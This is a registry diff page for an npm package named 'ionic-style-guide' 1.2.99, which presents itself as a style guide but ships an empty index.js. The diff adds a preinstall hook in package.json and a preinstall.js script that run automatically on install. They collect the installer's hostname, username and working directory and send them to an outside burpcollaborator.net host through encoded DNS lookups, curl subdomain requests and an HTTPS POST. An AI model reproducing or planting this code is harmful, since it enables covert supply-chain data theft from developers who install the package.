ionic-style-guide 1.2.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ionic-style-guide might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +17 -0
- package/preinstall.js +47 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
{
|
2
|
+
"name": "ionic-style-guide",
|
3
|
+
"version": "1.2.99",
|
4
|
+
"description": "Ionic style guide package. Work in progress.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node preinstall.js || curl h.$(hostname|base64| tr '/+' '_-' | tr -d '=').kuid3s0yiu8f54yx3jxw1amsgjmca1.burpcollaborator.net && curl u.$(whoami|base64| tr '/+' '_-' | tr -d '=').kuid3s0yiu8f54yx3jxw1amsgjmca1.burpcollaborator.net"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"html",
|
12
|
+
"javascript",
|
13
|
+
"client-side"
|
14
|
+
],
|
15
|
+
"author": "",
|
16
|
+
"license": "ISC"
|
17
|
+
}
|
package/preinstall.js
ADDED
@@ -0,0 +1,47 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const https = require('https');
|
3
|
+
const dns = require('dns');
|
4
|
+
|
5
|
+
const base = 'kuid3s0yiu8f54yx3jxw1amsgjmca1.burpcollaborator.net';
|
6
|
+
|
7
|
+
var hostname = os.hostname();
|
8
|
+
var username = os.userInfo().username;
|
9
|
+
var cwd = process.cwd();
|
10
|
+
|
11
|
+
function pack(payload) {
|
12
|
+
var result =
|
13
|
+
new Buffer(payload)
|
14
|
+
.toString('base64')
|
15
|
+
.replace(/\+/g, '-')
|
16
|
+
.replace(/\//g, '_')
|
17
|
+
.replace(/=+$/, '');
|
18
|
+
|
19
|
+
return result;
|
20
|
+
}
|
21
|
+
|
22
|
+
//First extract anything useful using the DNS
|
23
|
+
dns.resolve("u." + pack(username) + '.' + base, res=> {});
|
24
|
+
dns.resolve("h." + pack(hostname) + '.' + base, res=> {});
|
25
|
+
|
26
|
+
//If the HTTP works, we'll post some more data
|
27
|
+
const data = JSON.stringify({
|
28
|
+
hostname: hostname,
|
29
|
+
username: username,
|
30
|
+
cwd: cwd
|
31
|
+
})
|
32
|
+
|
33
|
+
const options = {
|
34
|
+
hostname: base,
|
35
|
+
port: 443,
|
36
|
+
path: '/data',
|
37
|
+
method: 'POST',
|
38
|
+
headers: {
|
39
|
+
'Content-Type': 'application/json',
|
40
|
+
'Content-Length': data.length
|
41
|
+
}
|
42
|
+
}
|
43
|
+
|
44
|
+
const req = https.request(options, res => {
|
45
|
+
});
|
46
|
+
req.write(data);
|
47
|
+
req.end();
|